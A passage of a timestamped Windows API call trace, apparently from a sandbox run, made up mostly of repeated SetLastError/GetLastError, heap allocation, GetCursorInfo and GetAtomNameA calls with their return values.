SetLastError (dwErrCode=0x0) [0180.417] GetLastError () returned 0x0 [0180.417] SetLastError (dwErrCode=0x0) [0180.417] GetLastError () returned 0x0 [0180.417] SetLastError (dwErrCode=0x0) [0180.417] GetLastError () returned 0x0 [0180.417] SetLastError (dwErrCode=0x0) [0180.417] GetLastError () returned 0x0 [0180.417] SetLastError (dwErrCode=0x0) [0180.417] GetLastError () returned 0x0 [0180.417] SetLastError (dwErrCode=0x0) [0180.417] GetLastError () returned 0x0 [0180.417] SetLastError (dwErrCode=0x0) [0180.417] GetLastError () returned 0x0 [0180.417] SetLastError (dwErrCode=0x0) [0180.417] GetLastError () returned 0x0 [0180.417] SetLastError (dwErrCode=0x0) [0180.417] GetLastError () returned 0x0 [0180.417] SetLastError (dwErrCode=0x0) [0180.417] GetLastError () returned 0x0 [0180.418] SetLastError (dwErrCode=0x0) [0180.418] GetLastError () returned 0x0 [0180.418] SetLastError (dwErrCode=0x0) [0180.418] GetLastError () returned 0x0 [0180.418] SetLastError (dwErrCode=0x0) [0180.418] GetLastError () returned 0x0 [0180.418] SetLastError (dwErrCode=0x0) [0180.418] GetLastError () returned 0x0 [0180.418] SetLastError (dwErrCode=0x0) [0180.418] GetLastError () returned 0x0 [0180.418] SetLastError (dwErrCode=0x0) [0180.418] GetLastError () returned 0x0 [0180.418] SetLastError (dwErrCode=0x0) [0180.418] GetLastError () returned 0x0 [0180.419] SetLastError (dwErrCode=0x0) [0180.419] GetLastError () returned 0x0 [0180.419] SetLastError (dwErrCode=0x0) [0180.419] GetLastError () returned 0x0 [0180.419] SetLastError (dwErrCode=0x0) [0180.419] GetLastError () returned 0x0 [0180.419] SetLastError (dwErrCode=0x0) [0180.419] GetLastError () returned 0x0 [0180.420] SetLastError (dwErrCode=0x0) [0180.420] GetLastError () returned 0x0 [0180.420] SetLastError (dwErrCode=0x0) [0180.420] GetLastError () returned 0x0 [0180.420] SetLastError (dwErrCode=0x0) [0180.420] GetLastError () returned 0x0 [0180.420] SetLastError (dwErrCode=0x0) [0180.420] GetLastError () returned 0x0 [0180.420] SetLastError (dwErrCode=0x0) [0180.420] GetLastError () returned 0x0 [0180.420] SetLastError (dwErrCode=0x0) [0180.420] GetLastError () returned 0x0 [0180.420] SetLastError (dwErrCode=0x0) [0180.420] GetLastError () returned 0x0 [0180.420] SetLastError (dwErrCode=0x0) [0180.420] GetLastError () returned 0x0 [0180.420] SetLastError (dwErrCode=0x0) [0180.420] GetLastError () returned 0x0 [0180.420] SetLastError (dwErrCode=0x0) [0180.420] GetLastError () returned 0x0 [0180.420] SetLastError (dwErrCode=0x0) [0180.420] GetLastError () returned 0x0 [0180.421] SetLastError (dwErrCode=0x0) [0180.421] GetLastError () returned 0x0 [0180.421] SetLastError (dwErrCode=0x0) [0180.421] GetLastError () returned 0x0 [0180.421] SetLastError (dwErrCode=0x0) [0180.421] GetLastError () returned 0x0 [0180.421] SetLastError (dwErrCode=0x0) [0180.421] GetLastError () returned 0x0 [0180.421] SetLastError (dwErrCode=0x0) [0180.421] GetLastError () returned 0x0 [0180.421] SetLastError (dwErrCode=0x0) [0180.421] GetLastError () returned 0x0 [0180.421] SetLastError (dwErrCode=0x0) [0180.421] GetLastError () returned 0x0 [0180.421] SetLastError (dwErrCode=0x0) [0180.421] GetLastError () returned 0x0 [0180.421] SetLastError (dwErrCode=0x0) [0180.421] GetLastError () returned 0x0 [0180.421] SetLastError (dwErrCode=0x0) [0180.421] RtlAllocateHeap (HeapHandle=0x1e40000, Flags=0x0, Size=0x5f) returned 0x1e41990 [0180.421] GetLastError () returned 0x0 [0180.421] SetLastError (dwErrCode=0x0) [0180.421] GetLastError () returned 0x0 [0180.422] SetLastError (dwErrCode=0x0) [0180.422] GetLastError () returned 0x0 [0180.422] SetLastError (dwErrCode=0x0) [0180.422] GetLastError () returned 0x0 [0180.422] SetLastError (dwErrCode=0x0) [0180.422] GetLastError () returned 0x0 [0180.422] SetLastError (dwErrCode=0x0) [0180.422] GetLastError () returned 0x0 [0180.422] SetLastError (dwErrCode=0x0) [0180.422] GetLastError () returned 0x0 [0180.422] SetLastError (dwErrCode=0x0) [0180.422] GetLastError () returned 0x0 [0180.422] SetLastError (dwErrCode=0x0) [0180.422] GetLastError () returned 0x0 [0180.422] SetLastError (dwErrCode=0x0) [0180.422] GetLastError () returned 0x0 [0180.422] SetLastError (dwErrCode=0x0) [0180.422] GetLastError () returned 0x0 [0180.422] SetLastError (dwErrCode=0x0) [0180.422] GetLastError () returned 0x0 [0180.423] SetLastError (dwErrCode=0x0) [0180.423] GetLastError () returned 0x0 [0180.423] SetLastError (dwErrCode=0x0) [0180.423] GetLastError () returned 0x0 [0180.423] SetLastError (dwErrCode=0x0) [0180.423] GetLastError () returned 0x0 [0180.423] SetLastError (dwErrCode=0x0) [0180.423] GetLastError () returned 0x0 [0180.423] SetLastError (dwErrCode=0x0) [0180.423] GetLastError () returned 0x0 [0180.423] SetLastError (dwErrCode=0x0) [0180.423] GetLastError () returned 0x0 [0180.423] SetLastError (dwErrCode=0x0) [0180.423] GetLastError () returned 0x0 [0180.423] SetLastError (dwErrCode=0x0) [0180.423] GetLastError () returned 0x0 [0180.423] SetLastError (dwErrCode=0x0) [0180.423] GetLastError () returned 0x0 [0180.423] SetLastError (dwErrCode=0x0) [0180.423] GetLastError () returned 0x0 [0180.423] SetLastError (dwErrCode=0x0) [0180.423] GetLastError () returned 0x0 [0180.424] SetLastError (dwErrCode=0x0) [0180.424] GetLastError () returned 0x0 [0180.424] SetLastError (dwErrCode=0x0) [0180.424] GetLastError () returned 0x0 [0180.424] SetLastError (dwErrCode=0x0) [0180.424] GetLastError () returned 0x0 [0180.424] SetLastError (dwErrCode=0x0) [0180.424] GetLastError () returned 0x0 [0180.424] SetLastError (dwErrCode=0x0) [0180.424] GetLastError () returned 0x0 [0180.424] SetLastError (dwErrCode=0x0) [0180.424] GetLastError () returned 0x0 [0180.424] SetLastError (dwErrCode=0x0) [0180.424] GetLastError () returned 0x0 [0180.424] SetLastError (dwErrCode=0x0) [0180.424] GetLastError () returned 0x0 [0180.424] SetLastError (dwErrCode=0x0) [0180.424] GetLastError () returned 0x0 [0180.425] SetLastError (dwErrCode=0x0) [0180.425] GetLastError () returned 0x0 [0180.425] SetLastError (dwErrCode=0x0) [0180.425] GetLastError () returned 0x0 [0180.425] SetLastError (dwErrCode=0x0) [0180.425] GetLastError () returned 0x0 [0180.425] SetLastError (dwErrCode=0x0) [0180.425] GetLastError () returned 0x0 [0180.425] SetLastError (dwErrCode=0x0) [0180.425] GetLastError () returned 0x0 [0180.425] SetLastError (dwErrCode=0x0) [0180.425] GetLastError () returned 0x0 [0180.425] SetLastError (dwErrCode=0x0) [0180.425] GetLastError () returned 0x0 [0180.425] SetLastError (dwErrCode=0x0) [0180.425] GetLastError () returned 0x0 [0180.425] SetLastError (dwErrCode=0x0) [0180.425] GetLastError () returned 0x0 [0180.425] SetLastError (dwErrCode=0x0) [0180.425] GetLastError () returned 0x0 [0180.426] SetLastError (dwErrCode=0x0) [0180.426] GetLastError () returned 0x0 [0180.426] SetLastError (dwErrCode=0x0) [0180.426] GetLastError () returned 0x0 [0180.426] SetLastError (dwErrCode=0x0) [0180.426] GetLastError () returned 0x0 [0180.426] SetLastError (dwErrCode=0x0) [0180.426] GetLastError () returned 0x0 [0180.426] SetLastError (dwErrCode=0x0) [0180.426] GetLastError () returned 0x0 [0180.426] SetLastError (dwErrCode=0x0) [0180.426] GetLastError () returned 0x0 [0180.426] SetLastError (dwErrCode=0x0) [0180.426] GetLastError () returned 0x0 [0180.426] SetLastError (dwErrCode=0x0) [0180.426] GetLastError () returned 0x0 [0180.426] SetLastError (dwErrCode=0x0) [0180.426] GetLastError () returned 0x0 [0180.426] SetLastError (dwErrCode=0x0) [0180.426] GetLastError () returned 0x0 [0180.426] SetLastError (dwErrCode=0x0) [0180.426] GetLastError () returned 0x0 [0180.427] SetLastError (dwErrCode=0x0) [0180.427] GetLastError () returned 0x0 [0180.427] SetLastError (dwErrCode=0x0) [0180.427] GetLastError () returned 0x0 [0180.427] SetLastError (dwErrCode=0x0) [0180.427] GetLastError () returned 0x0 [0180.427] SetLastError (dwErrCode=0x0) [0180.427] GetLastError () returned 0x0 [0180.427] SetLastError (dwErrCode=0x0) [0180.427] GetLastError () returned 0x0 [0180.427] SetLastError (dwErrCode=0x0) [0180.427] GetLastError () returned 0x0 [0180.427] SetLastError (dwErrCode=0x0) [0180.427] GetLastError () returned 0x0 [0180.427] SetLastError (dwErrCode=0x0) [0180.427] GetLastError () returned 0x0 [0180.427] SetLastError (dwErrCode=0x0) [0180.427] GetLastError () returned 0x0 [0180.427] SetLastError (dwErrCode=0x0) [0180.427] GetLastError () returned 0x0 [0180.427] SetLastError (dwErrCode=0x0) [0180.427] GetLastError () returned 0x0 [0180.428] SetLastError (dwErrCode=0x0) [0180.428] GetLastError () returned 0x0 [0180.428] SetLastError (dwErrCode=0x0) [0180.428] GetLastError () returned 0x0 [0180.428] SetLastError (dwErrCode=0x0) [0180.428] GetLastError () returned 0x0 [0180.428] SetLastError (dwErrCode=0x0) [0180.428] GetLastError () returned 0x0 [0180.428] SetLastError (dwErrCode=0x0) [0180.428] GetLastError () returned 0x0 [0180.428] SetLastError (dwErrCode=0x0) [0180.428] GetLastError () returned 0x0 [0180.428] SetLastError (dwErrCode=0x0) [0180.428] GetLastError () returned 0x0 [0180.428] SetLastError (dwErrCode=0x0) [0180.428] GetLastError () returned 0x0 [0180.428] SetLastError (dwErrCode=0x0) [0180.428] GetLastError () returned 0x0 [0180.428] SetLastError (dwErrCode=0x0) [0180.428] GetLastError () returned 0x0 [0180.428] SetLastError (dwErrCode=0x0) [0180.428] GetLastError () returned 0x0 [0180.429] SetLastError (dwErrCode=0x0) [0180.429] GetLastError () returned 0x0 [0180.429] SetLastError (dwErrCode=0x0) [0180.429] GetLastError () returned 0x0 [0180.429] SetLastError (dwErrCode=0x0) [0180.429] GetLastError () returned 0x0 [0180.429] SetLastError (dwErrCode=0x0) [0180.429] GetLastError () returned 0x0 [0180.429] SetLastError (dwErrCode=0x0) [0180.429] GetLastError () returned 0x0 [0180.429] SetLastError (dwErrCode=0x0) [0180.429] GetLastError () returned 0x0 [0180.429] SetLastError (dwErrCode=0x0) [0180.429] GetLastError () returned 0x0 [0180.429] SetLastError (dwErrCode=0x0) [0180.429] GetLastError () returned 0x0 [0180.429] SetLastError (dwErrCode=0x0) [0180.429] GetLastError () returned 0x0 [0180.429] SetLastError (dwErrCode=0x0) [0180.429] GetLastError () returned 0x0 [0180.430] SetLastError (dwErrCode=0x0) [0180.430] GetLastError () returned 0x0 [0180.430] SetLastError (dwErrCode=0x0) [0180.430] GetLastError () returned 0x0 [0180.430] SetLastError (dwErrCode=0x0) [0180.430] RtlAllocateHeap (HeapHandle=0x1e40000, Flags=0x8, Size=0x98) returned 0x1e419f8 [0180.430] RtlAllocateHeap (HeapHandle=0x1e40000, Flags=0x8, Size=0x1f) returned 0x1e41a98 [0180.430] RtlAllocateHeap (HeapHandle=0x1e40000, Flags=0x8, Size=0x36) returned 0x1e41ac0 [0180.430] RtlAllocateHeap (HeapHandle=0x1e40000, Flags=0x8, Size=0x37) returned 0x1e41b00 [0180.430] RtlAllocateHeap (HeapHandle=0x1e40000, Flags=0x8, Size=0x3c) returned 0x1e41b40 [0180.430] RtlAllocateHeap (HeapHandle=0x1e40000, Flags=0x8, Size=0x31) returned 0x1e41b88 [0180.430] RtlAllocateHeap (HeapHandle=0x1e40000, Flags=0x8, Size=0x17) returned 0x1e41bc8 [0180.430] RtlAllocateHeap (HeapHandle=0x1e40000, Flags=0x8, Size=0x24) returned 0x1e41be8 [0180.430] RtlAllocateHeap (HeapHandle=0x1e40000, Flags=0x8, Size=0x14) returned 0x1e41c18 [0180.430] RtlAllocateHeap (HeapHandle=0x1e40000, Flags=0x8, Size=0xd) returned 0x1e41c38 [0180.430] RtlAllocateHeap (HeapHandle=0x1e40000, Flags=0x8, Size=0x25) returned 0x1e41c50 [0180.430] RtlAllocateHeap (HeapHandle=0x1e40000, Flags=0x8, Size=0x39) returned 0x1e41c80 [0180.430] RtlAllocateHeap (HeapHandle=0x1e40000, Flags=0x8, Size=0x18) returned 0x1e41cc8 [0180.430] RtlAllocateHeap (HeapHandle=0x1e40000, Flags=0x8, Size=0x17) returned 0x1e41ce8 [0180.430] RtlAllocateHeap (HeapHandle=0x1e40000, Flags=0x8, Size=0xe) returned 0x1e41d08 [0180.430] RtlAllocateHeap (HeapHandle=0x1e40000, Flags=0x8, Size=0x69) returned 0x1e41d20 [0180.430] RtlAllocateHeap (HeapHandle=0x1e40000, Flags=0x8, Size=0x3e) returned 0x1e41d98 [0180.430] RtlAllocateHeap (HeapHandle=0x1e40000, Flags=0x8, Size=0x1b) returned 0x1e41de0 [0180.430] RtlAllocateHeap (HeapHandle=0x1e40000, Flags=0x8, Size=0x1d) returned 0x1e41e08 [0180.430] RtlAllocateHeap (HeapHandle=0x1e40000, Flags=0x8, Size=0x48) returned 0x1e41e30 [0180.430] RtlAllocateHeap (HeapHandle=0x1e40000, Flags=0x8, Size=0x12) returned 0x1e41e80 [0180.430] RtlAllocateHeap (HeapHandle=0x1e40000, Flags=0x8, Size=0x18) returned 0x1e41ea0 [0180.430] RtlAllocateHeap (HeapHandle=0x1e40000, Flags=0x8, Size=0x1b) returned 0x1e41ec0 [0180.430] RtlAllocateHeap (HeapHandle=0x1e40000, Flags=0x8, Size=0x24) returned 0x1e41ee8 [0180.430] RtlAllocateHeap (HeapHandle=0x1e40000, Flags=0x8, Size=0x29) returned 0x1e41f18 [0180.430] RtlAllocateHeap (HeapHandle=0x1e40000, Flags=0x8, Size=0x1e) returned 0x1e41f50 [0180.430] RtlAllocateHeap (HeapHandle=0x1e40000, Flags=0x8, Size=0x41) returned 0x1e41f78 [0180.431] RtlAllocateHeap (HeapHandle=0x1e40000, Flags=0x8, Size=0x17) returned 0x1e41fc8 [0180.431] RtlAllocateHeap (HeapHandle=0x1e40000, Flags=0x8, Size=0xf) returned 0x1e41fe8 [0180.431] RtlAllocateHeap (HeapHandle=0x1e40000, Flags=0x8, Size=0x16) returned 0x1e42000 [0180.431] RtlAllocateHeap (HeapHandle=0x1e40000, Flags=0x8, Size=0x2a) returned 0x1e42020 [0180.431] RtlAllocateHeap (HeapHandle=0x1e40000, Flags=0x8, Size=0x29) returned 0x1e42058 [0180.431] RtlAllocateHeap (HeapHandle=0x1e40000, Flags=0x8, Size=0x15) returned 0x1e42090 [0180.431] RtlAllocateHeap (HeapHandle=0x1e40000, Flags=0x8, Size=0x1e) returned 0x1e420b0 [0180.431] RtlAllocateHeap (HeapHandle=0x1e40000, Flags=0x8, Size=0x2a) returned 0x1e420d8 [0180.431] RtlAllocateHeap (HeapHandle=0x1e40000, Flags=0x8, Size=0x12) returned 0x1e42110 [0180.431] RtlAllocateHeap (HeapHandle=0x1e40000, Flags=0x8, Size=0x18) returned 0x1e42130 [0180.431] RtlAllocateHeap (HeapHandle=0x1e40000, Flags=0x8, Size=0x46) returned 0x1e42150 [0180.431] HeapFree (in: hHeap=0x1e40000, dwFlags=0x0, lpMem=0x1e411f8 | out: hHeap=0x1e40000) returned 1 [0180.432] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0180.432] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0180.432] RtlAllocateHeap (HeapHandle=0x1e40000, Flags=0x8, Size=0x80) returned 0x1e411f8 [0180.432] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4031bc) returned 0x0 [0180.432] RtlSizeHeap (HeapHandle=0x1e40000, Flags=0x0, MemoryPointer=0x1e411f8) returned 0x80 [0180.432] GetLastError () returned 0x0 [0180.432] SetLastError (dwErrCode=0x0) [0180.432] GetLastError () returned 0x0 [0180.432] SetLastError (dwErrCode=0x0) [0180.432] GetLastError () returned 0x0 [0180.433] SetLastError (dwErrCode=0x0) [0180.433] GetLastError () returned 0x0 [0180.433] SetLastError (dwErrCode=0x0) [0180.433] GetLastError () returned 0x0 [0180.433] SetLastError (dwErrCode=0x0) [0180.433] GetLastError () returned 0x0 [0180.433] SetLastError (dwErrCode=0x0) [0180.433] GetLastError () returned 0x0 [0180.433] SetLastError (dwErrCode=0x0) [0180.433] GetLastError () returned 0x0 [0180.433] SetLastError (dwErrCode=0x0) [0180.433] GetLastError () returned 0x0 [0180.433] SetLastError (dwErrCode=0x0) [0180.433] GetLastError () returned 0x0 [0180.433] SetLastError (dwErrCode=0x0) [0180.433] GetLastError () returned 0x0 [0180.433] SetLastError (dwErrCode=0x0) [0180.433] GetLastError () returned 0x0 [0180.433] SetLastError (dwErrCode=0x0) [0180.433] GetLastError () returned 0x0 [0180.433] SetLastError (dwErrCode=0x0) [0180.433] GetLastError () returned 0x0 [0180.433] SetLastError (dwErrCode=0x0) [0180.434] GetLastError () returned 0x0 [0180.434] SetLastError (dwErrCode=0x0) [0180.434] GetLastError () returned 0x0 [0180.434] SetLastError (dwErrCode=0x0) [0180.434] GetLastError () returned 0x0 [0180.434] SetLastError (dwErrCode=0x0) [0180.434] GetLastError () returned 0x0 [0180.434] SetLastError (dwErrCode=0x0) [0180.434] GetLastError () returned 0x0 [0180.434] SetLastError (dwErrCode=0x0) [0180.434] GetLastError () returned 0x0 [0180.434] SetLastError (dwErrCode=0x0) [0180.434] GetLastError () returned 0x0 [0180.434] SetLastError (dwErrCode=0x0) [0180.434] GetLastError () returned 0x0 [0180.434] SetLastError (dwErrCode=0x0) [0180.434] GetLastError () returned 0x0 [0180.434] SetLastError (dwErrCode=0x0) [0180.434] GetLastError () returned 0x0 [0180.434] SetLastError (dwErrCode=0x0) [0180.434] GetLastError () returned 0x0 [0180.435] SetLastError (dwErrCode=0x0) [0180.435] GetLastError () returned 0x0 [0180.435] SetLastError (dwErrCode=0x0) [0180.435] GetLastError () returned 0x0 [0180.435] SetLastError (dwErrCode=0x0) [0180.435] GetLastError () returned 0x0 [0180.435] SetLastError (dwErrCode=0x0) [0180.435] GetLastError () returned 0x0 [0180.435] SetLastError (dwErrCode=0x0) [0180.435] GetLastError () returned 0x0 [0180.435] SetLastError (dwErrCode=0x0) [0180.435] GetLastError () returned 0x0 [0180.435] SetLastError (dwErrCode=0x0) [0180.435] GetLastError () returned 0x0 [0180.435] SetLastError (dwErrCode=0x0) [0180.435] GetLastError () returned 0x0 [0180.435] SetLastError (dwErrCode=0x0) [0180.435] GetLastError () returned 0x0 [0180.435] SetLastError (dwErrCode=0x0) [0180.435] GetLastError () returned 0x0 [0180.435] SetLastError (dwErrCode=0x0) [0180.435] GetLastError () returned 0x0 [0180.435] SetLastError (dwErrCode=0x0) [0180.435] GetLastError () returned 0x0 [0180.436] SetLastError (dwErrCode=0x0) [0180.436] GetLastError () returned 0x0 [0180.436] SetLastError (dwErrCode=0x0) [0180.436] GetLastError () returned 0x0 [0180.436] SetLastError (dwErrCode=0x0) [0180.436] GetLastError () returned 0x0 [0180.436] SetLastError (dwErrCode=0x0) [0180.436] GetLastError () returned 0x0 [0180.436] SetLastError (dwErrCode=0x0) [0180.436] GetLastError () returned 0x0 [0180.436] SetLastError (dwErrCode=0x0) [0180.436] GetLastError () returned 0x0 [0180.436] SetLastError (dwErrCode=0x0) [0180.436] GetLastError () returned 0x0 [0180.436] SetLastError (dwErrCode=0x0) [0180.436] GetLastError () returned 0x0 [0180.436] SetLastError (dwErrCode=0x0) [0180.436] GetLastError () returned 0x0 [0180.436] SetLastError (dwErrCode=0x0) [0180.436] GetLastError () returned 0x0 [0180.436] SetLastError (dwErrCode=0x0) [0180.437] GetLastError () returned 0x0 [0180.437] SetLastError (dwErrCode=0x0) [0180.437] GetLastError () returned 0x0 [0180.437] SetLastError (dwErrCode=0x0) [0180.437] GetLastError () returned 0x0 [0180.437] SetLastError (dwErrCode=0x0) [0180.437] GetLastError () returned 0x0 [0180.437] SetLastError (dwErrCode=0x0) [0180.437] GetLastError () returned 0x0 [0180.437] SetLastError (dwErrCode=0x0) [0180.437] GetLastError () returned 0x0 [0180.437] SetLastError (dwErrCode=0x0) [0180.437] GetLastError () returned 0x0 [0180.437] SetLastError (dwErrCode=0x0) [0180.437] GetLastError () returned 0x0 [0180.437] SetLastError (dwErrCode=0x0) [0180.437] GetLastError () returned 0x0 [0180.437] SetLastError (dwErrCode=0x0) [0180.437] GetLastError () returned 0x0 [0180.438] SetLastError (dwErrCode=0x0) [0180.438] GetLastError () returned 0x0 [0180.438] SetLastError (dwErrCode=0x0) [0180.438] GetLastError () returned 0x0 [0180.438] SetLastError (dwErrCode=0x0) [0180.438] GetLastError () returned 0x0 [0180.438] SetLastError (dwErrCode=0x0) [0180.438] GetLastError () returned 0x0 [0180.438] SetLastError (dwErrCode=0x0) [0180.438] GetLastError () returned 0x0 [0180.438] SetLastError (dwErrCode=0x0) [0180.438] GetLastError () returned 0x0 [0180.438] SetLastError (dwErrCode=0x0) [0180.438] GetLastError () returned 0x0 [0180.438] SetLastError (dwErrCode=0x0) [0180.438] GetLastError () returned 0x0 [0180.438] SetLastError (dwErrCode=0x0) [0180.438] GetLastError () returned 0x0 [0180.438] SetLastError (dwErrCode=0x0) [0180.438] GetLastError () returned 0x0 [0180.438] SetLastError (dwErrCode=0x0) [0180.438] GetLastError () returned 0x0 [0180.439] SetLastError (dwErrCode=0x0) [0180.439] GetLastError () returned 0x0 [0180.439] SetLastError (dwErrCode=0x0) [0180.439] GetLastError () returned 0x0 [0181.363] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.566] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.566] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.629] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.629] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.630] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.630] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.630] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.630] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.630] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.630] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.630] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.630] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.630] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.630] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.630] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.630] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.630] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.630] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.630] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.630] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.631] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.631] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.631] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.631] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.631] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.631] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.631] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.631] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.631] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.631] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.631] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.631] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.631] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.631] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.631] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.632] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.632] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.632] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.632] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.632] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.632] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.632] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.632] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.632] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.632] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.632] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.632] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.632] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.632] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.632] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.633] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.633] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.633] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.633] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.633] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.633] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.633] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.633] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.633] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.633] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.633] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.633] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.633] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.633] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.633] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.633] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.634] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.634] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.634] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.634] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.634] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.634] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.634] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.634] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.634] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.634] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.634] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.634] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.634] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.634] GetCursorInfo (in: 